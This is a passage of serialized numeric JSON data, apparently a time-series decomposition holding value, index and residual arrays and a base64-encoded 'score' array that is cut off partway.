10970449,699900721,705903191,695400321,708646104,732700953,733170194,710454520,715013559,685941869,715679320,709386828,730603322,716645009,756866378,760141947,807255352,846848692,667607502,689952957,717168338,730019233,1034815995,1084615213,1113302046,1109839185,1118316663,1112841929,1163509527,1190010750,1186371081,1183768097,1187740313,1156192840,1190446938,1176341557,1172639009,1141022514,1182288786,1155234517,1199017174,1194453133,987434393,1011166772,993931514,1000513431,1310849420,1355050833,1361578726,1328476423,1298978256,1275870119,1319263264,1319637578,1306121831,1296141125,1272048741,1240694270,1260351920,1241710983,1207970645,1178436647,1223192665,1208803119,1252414012,1224693697,1038274482,1069876469,1047653919,1060782656,1352570441,1345692577,1359115185,1325398501,1297737291,1290528183,1319860656,1337172098,1321527015,1308962650,1273738426,1275701627,1283611911,1275484643,1235505168,1219877436,1253235930,1259293173,1293338540,1257103074,1083143722,1105734024,1104088851,1111922871,1387496179,1297403594,1314115494,1284159872,1284639608,1281452984,1293414314,1328795968,1320575452,1311085148,1264631702,1292499672,1300379573,1297100692,1275848476,1284081167,1293962516,1308043930,1342785131,1320265346,1159450181,1160452064,1187078795,1189906128,1415729535,1296551994,1318007279,1282282272,1316274068,1305924347,1296338768,1333403079,1327017322,1315275608,1243224896,1258405251,1243164881,1221518957,1207064307,1201697703,1178627154,1148071366,1171485239,1144879107,961254849,925263258,939372996,906325912,1138911085,1004920928,1000604363,948370902,977155490,946353011,908187538,935629257,911420829,903620366,824762701,821007505,794577148,784990780,790138158,798263326,781582056,740079688,786033197,793032237,618982717,595540111,622122701,609182407,885065338,829216774,844114720,812388553,853771364,835500023,824211194,865721042,860669311,885875540,832373598,825861314,821121913,841405647,857563388,887122493,893840093,862947195,928916970,952321994,799854473,798713580,825071650,830485070,1175337043,1172659264,1214068890,1208211959,1243474971,1253841995,1258289260,1303266832,1310630783,1342852399,1299877378,1278001064,1280009495,1313018149,1288518969,1314856748,1321741434,1276283344,1314990271,1308741734,1145682993,1140473722,1130935487,1112709627,1466888763,1449284157,1469212767,1443128278,1452100444,1438550900,1419328541,1450534241,1433386080,1432714535,1390167398,1347833560,1357792081,1383489517,1321394740,1350043649,1360245567,1322690529,1347608524,1332689196,1178020818,1195808543,1187028732,1180451879,1446032136,1439653476,1471743027,1443439373,1455236488,1441780854,1436186961,1455285907,1444521096,1445436950,1419505721,1385571180,1364286071,1429325592,1359775006,1399156689,1415017971,1387243579,1403773141,1381284525,1247614350,1271293168,1265103404,1264873271,1425270772,1420775243,1460056735,1431381987,1445498423,1445056269,1437943379,1439611996,1439344539,1445141681,1416162250,1398771596,1312187056,1442107795,1373747172,1429234820,1432510050,1429995041,1424670065,1412894903,1286635120,1303399766,1301485250,1309222091,1395829866,1396272296,1416398636,1410498249,1411237964,1419335225,1410839819,1403882789,1409707902,1427817478,1365901383,1349867884,1260242566,1365139634,1294151975,1346563071,1319692036,1309194234,1274344889,1267857223,1102552609,1092326765,1073822013,1055193310,1237470098,1107731873,1088552881,1088072252,1053365749,1051208792,1029153696,999684088,1003025411,1036113052,940032299,926625185,838953787,937962579,887107732,961458514,936412131,942588334,914622753,948271771,783342000,786655133,786519759,781831387,1115847925,873635109,851611122,897800580,863594719,890973997,887705622,872085135,905005999,979823454,868639326,874281090,817554391,907975827,881632015,976391884,950248217,962277823,929343918,989469820,805339853,804119604,804171595,791107817,1282711661],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,653,654,655,656,657,658,659,660,661,662,663,664,665,666,667,668,669,670,671,672,673,674,675,676,677,678,679,680,681,682,683,684,685,686,687,688,689,690,691,692,693,694,695,696,697,698,699,700,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,735,736,737,738,739,740,741,742,743,744,745,746,747,748,749,750,751,752,753,754,755,756,757,758,759,760,761,762,763,764,765,766,767,768,769,770,771,772,773,774,775,776,777,778,779,780,781,782,783,784,785,786,787,788,789,790,791,792,793,794,795,796,797,798,799,800,801,802,803,804,805,806,807,808,809,810,811,812,813,814,815,816,817,818,819,820,821,822,823,824,825,826,827,828,829,830,831,832,833,834,835,836,837,838,839],\"residual\":[-11615960,-1950242,-6962417,14084958,5196383,-14682202,28680487,-2367079,-41197360,-4920246,11479753,-23170089,-28170706,11419756,11767734,1472476,-25259914,17188979,48485704,14279575,27178445,48347990,44381862,-36664053,-6756640,2987174,14308363,-49348795,-14448623,27433823,-57500615,-1297935,37085573,26504937,-21175674,45985335,16535620,-30326641,3077079,5063533,41851484,12927096,-28720082,8524690,-23926816,-22881694,-32046934,6303546,4937204,-25640914,-29124234,42093917,-1306834,-17313274,1681735,6304541,44399096,-34600121,13153222,-39417974,41700560,27850040,-18996392,-12257002,4442780,-51371881,-33495561,-31004599,-2685182,-30407478,-4394284,67684799,55237552,45622112,32113744,3671600,22877165,-454559,67790606,-1281531,-43228614,3921005,-11240317,44308824,-14009280,-13264660,-24148724,3630941,-37467022,-8613403,-60552216,-28598403,-44367979,-95020561,-96844975,51467812,51118675,31529711,76640891,43832405,37279620,97832030,16127645,30058065,61874720,42512286,67277780,16478173,33400072,118564632,81327360,102549118,88665565,84652977,146787883,127246545,189481154,219881135,192460234,-203292500,-214384314,-175112341,-169765474,-166867211,-117132691,-45209602,-140373356,-83612612,-65663055,-84547976,-51874001,-11137807,-54502991,-77307448,8626809,-37838760,13140160,23396721,318888,92131,-11544613,16918070,20442147,-3034243,17402926,-8516623,-13411529,12720169,7152270,-293301092,15733198,32024074,-39056067,-6170851,-67902598,-63359880,-29429790,-63453213,-137996431,-88729460,-138371357,-109808635,-130540117,-174742950,-199543501,-215979032,-212572005,216568847,143596087,194872065,150312017,137148334,86972118,226121610,82757819,170731091,53195007,41669857,66480478,4026371,18617036,12087725,73679163,38591346,20200900,25079704,55616227,100996561,42973513,73318515,61853053,-65331503,-3593038,-40323355,-65184750,-29825008,-16638118,19360458,-12823540,-298588127,2357572,-9405710,10639849,56905922,24601106,64107984,-4000998,-13503790,54142046,21215123,24369135,-7492269,54530794,-10604818,33836251,-26464989,-20762132,-35446573,23767773,-23713048,-11795016,-8886768,14675103,90305769,1709271,21375839,-29135540,-2834081,18877112,-22700567,-2549115,-17077189,-10675044,-24680750,-45166316,-15750811,-23598199,15118077,-14998098,5904792,-6891564,17920882,-6835941,49081289,20438664,36327488,-11745196,77067690,-1511271,10974353,14552780,-71223716,-23678791,-22615565,-4357854,11614447,-24926562,-36356877,-53139629,-25599843,-59417670,-78141849,-85147787,80444402,59231096,79729116,99093798,28174990,71063278,25856786,56986462,32122277,50679562,61518101,38644185,-54191461,76875216,66943462,105914856,111301498,65525488,153348566,178615033,128264915,159762190,215836867,245380517,-191917253,-176060477,-216534516,-219912617,-142481071,-163708050,-144357769,-138458324,-102365646,-79538764,-102243380,-58302715,261330284,-58555917,-55340277,-70488621,-50414799,6508462,-38932680,-38363914,4324946,25808355,-32314043,-48328027,-13144886,22864740,6250379,13623549,-49305154,-34228458,6236442,-3830843,5321315,-7726193,-52696245,-39281111,-150397420,-99393716,-26941885,-75745799,-94177007,-105470348,-106245781,-142037076,-169471301,-202027575,-178019909,-181764048,186404262,160790822,190840217,145320031,187978205,171808482,92218707,106401447,47038636,21295632,86648266,48561262,-175456,108656694,26116318,39040186,28444180,32896059,33880246,71065072,26611542,67728781,37297853,24859910,-60739819,-66603530,-71142689,-2384421,-72646239,-55254309,-6354183,-7394588,24561611,16675782,675513,36206047,-23907672,-14864909,21876459,33907048,-144200198,33599797,22600740,29224970,82618189,10974438,43998647,65625959,1599028,-27747662,-21412596,-51341800,-1021879,-4544211,6671087,-25266267,-32540023,7116664,-14642281,-34346828,5861694,-47719337,-20661695,-19513182,295773799,6524107,-48493363,-54052697,-62240004,-3056964,-19203872,-35468834,-4190442,58860348,54305873,29915727,38249573,2473050,16478611,-13050906,-17545644,964617,-37769565,-21579208,30783887,50681630,-17452322,-31625560,-95276804,-58679148,2553025,-7354185,-40028476,-54772918,-60709744,-34979178,91340662,39593566,42966172,48239402,64216674,29956830,20549469,55231218,62925647,50264137,89050329,97947583,37304412,33743598,41637079,101536379,53549447,109960756,124224232,106056480,160049076,188124698,193374082,168907366,-185200822,-188685340,-191815926,-156032581,-199423161,-82127558,-149391409,-97070032,-60210796,-85455308,-66328129,-69841251,-74872386,-15793917,11189043,-34557110,-39652688,25346903,-42406405,17926112,21903219,-25582689,4113097,-2078378,-24460065,-36949246,-8529592,-24029562,19383325,-24426421,19239677,11987018,-58084898,-58574771,-49772387,-58646768,-32369206,-101699133,-63491340,-69778957,-101748161,-145988414,-103326167,-159702786,-176575817,-214115753,-189332420,-193645042,198750654,217656794,175802170,171268805,160636637,119269938,131142274,50450676,118831175,112247059,77764728,47319753,65437293,54972963,13768911,25813444,23476825,11121795,24835439,75213925,53795939,97402804,38069401,55298719,-76185459,-61298422,-49173275,-55683856,-54041079,-47321998,-72898438,7387349,-62394992,-49532222,-5198569,9758034,-24129503,20066881,33742091,10255194,67213643,29128046,33852721,30030828,-13948931,59220027,47090622,45371265,-80925429,2101874,-7460066,9544184,-46560617,-20913074,24591091,-22196984,16051136,39418699,25386648,-14595866,11505228,82179,-16904538,-13920844,-24326167,21015077,-308828,-47722642,36221427,-44813258,-42652109,-17865035,-48899143,15761838,49099482,7050766,16842535,16790889,31178068,17391603,26026856,-4061977,-17799382,27519983,21731317,-7694251,-30732383,-50391452,-47859258,-25818239,-17935617,-55840148,-74004367,-56625408,-52057252,-95954198,353181952,48092372,7112546,70400972,72037536,80253946,18546375,56694206,13355026,-6959610,5252562,49365724,34629818,79507669,68815536,135929836,88220356,102754917,79290223,158186634,121904408,150526865,184871640,236543603,-294276852,-173067934,-142485038,-191671872,-117808986,-163397185,-142037876,-115520032,-67850902,-41578014,-52136433,-79742152,-41939371,-73909980,-2808524,-37825450,-5720640,-32578139,-29747,-10529178,32782742,17806164,18966662,-20825461,-59242918,-8728174,-4304702,4292578,-47043719,26621738,26217398,-31889720,-22681221,-3236212,-20197815,-37103161,-84593333,-78076434,-75524639,-94915878,-80916631,-125585374,-119940980,-145867435,-144971692,-202876101,-210009265,-224511788,193589388,183267231,134857833,129094322,167091071,87893077,85505963,131954011,68736718,41457806,65579965,82150965,86909615,63756571,50158163,64551854,5018531,61060792,50632414,81518530,16450470,50716871,41083770,96761626,-48854676,-85542111,-43936829,-10368990,-71550826,-39879723,-14259568,-64847922,-23394299,14605105,-9501058,-14616893,-35031720,15215713,-5844864,6693520,34060486,186436,5906445,1184340,48630220,59952592,44484325,-11705383,-29393070,-12540741,-10361813,-31422725,-7704584,36121164,-41324938,22054577,38493968,-1855326,-14511210,-58866265,41419046,2760438,-10264991,-26447432,11240993,13426983,-9987867,-21016234,-20452112,-10460352,-2052269,4430794,17684166,74506929,29729922,17084279,35464315,-46453436,31162371,29252806,-27148371,-44996208,22992697,42983918,139483613,-27702450,-12013266,-39464043,-42742846,-72459434,-12473809,-51650739,-72518741,-84703239,-65473374,-50377611,75357004,11227850,89345453,64924907,69524970,84278884,85562727,13153495,27785691,65775348,70280174,91180060,-267089725,88083673,79333431,125235298,99739134,144605192,98592610,112080812,181904766,195576122,162322757,206207631,-277261311,-168636051,-157574196,-143242154,-128268232,-64900550,-109659855,-72465728,-31525704,-80341769,-105449967,-73994515,35550814,-23950264,-52346188,-52714166,-83249351,-20323152,-54703060,-18160681,-45648132,-64431381,-27747182,-75415676,-120950455,101209861,64851876,67922142,49750536,9517350,29395189,33130671,5642863,28594855,32326535,-4106735,58744656,-29188883,-7106168,-23040462,11061139,-52064989,-16154255,-42799457,-50851080,-41608878,-58056590,-46525477,187044904],\"score\":{\"__ndarray__\":\"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